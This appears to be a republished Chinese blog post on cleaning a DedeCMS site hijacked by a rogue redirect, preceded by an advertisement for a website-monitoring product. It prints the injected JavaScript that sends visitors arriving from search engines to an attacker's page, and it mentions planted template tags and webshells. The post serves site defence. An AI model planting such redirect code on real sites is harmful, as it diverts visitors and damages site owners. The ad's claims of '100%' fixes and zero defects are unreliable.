页面劫持修复方法,织梦dedeCMS被流氓网站劫持如何解决
IIS7網站監控可以及時防控網站風險,快速準確監控網站是否遭到各種劫持攻擊,網站在全國是否能正常打開(查看域名是否被墻),精準的DNS污染檢測,具備網站打開速度檢測功能,第一時間知道網站是否被黑、被入侵、被改標題、被掛黑鏈。精益求精的產品,缺陷為零數據提供!
它可以做到以下功能:
1、檢測網站是否被黑
2、檢測網站是否被劫持
3、檢測域名是否被墻
4、檢測DNS是否被污染
5、網站真實的完全打開時間(獨家)
6、擁有獨立監控后臺,24小時定時監控域名
官方圖:
官方地址:IIS7網站監控
我去找了些方法供大家嘗試100%可以刪除掉的
一、首先,檢測網頁的index.html源碼是否有異常。因為這個頁面是最后生成的靜態頁,結果發現多了一段的js代碼。
這個代碼主要是用來做跳轉的,打開源碼,內容是:
var d=document.referrer;
if(d.indexOf(“baidu”)>0||d.indexOf(“google”)>0||d.indexOf(“sogou”)>0||d.indexOf(“bing”)>0||d.indexOf(“soso”)>0||d.indexOf(“youdao”)>0||d.indexOf(“zhongsou”)>0)
{window.location.href=“http://www.***.com/7y/1.asp”;}
他會判斷是否來自搜索引擎,如果來自搜索引擎,則執行跳轉命令。
二、第二步,查看模板的index.htm文件,看對應的模板文件是什么?
找到了一個黑客創建的織夢標簽:{dede:dinfo/},很明顯就是他。
三、第三步,打開織夢管理后臺,標簽源碼管理,嘗試查找dinfo相關的lib文件。
找到對應的標簽文件,對他進行刪除。
四、第四步,查看黑客怎么做到的,并進行防護。
(第一系統后臺,用戶組是否多了, 第二查看所有能添加變量 第三,模塊管理中是否多了東西, 第四,頻道模型,第五 自定義宏標記等等.大多數情況下是plus 或者模板里面的asp或php木馬,數據庫里面對應的木馬數據不刪除,就算你刪除了木馬文件照樣會重新生成。common.inc.php 文件也要多多留意,一般情況下 如果修改模板后仍然被改首頁 有必要重新覆蓋下這個文件,)
五、如果有權限的話最好把FTP禁止上傳文件。條件允許的話
總結
以上是生活随笔為你收集整理的页面劫持修复方法,织梦dedeCMS被流氓网站劫持如何解决的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 一个简单的java代码,输入当前星期,输
- 下一篇: 技术干货 | PACMOO:基于帕累托最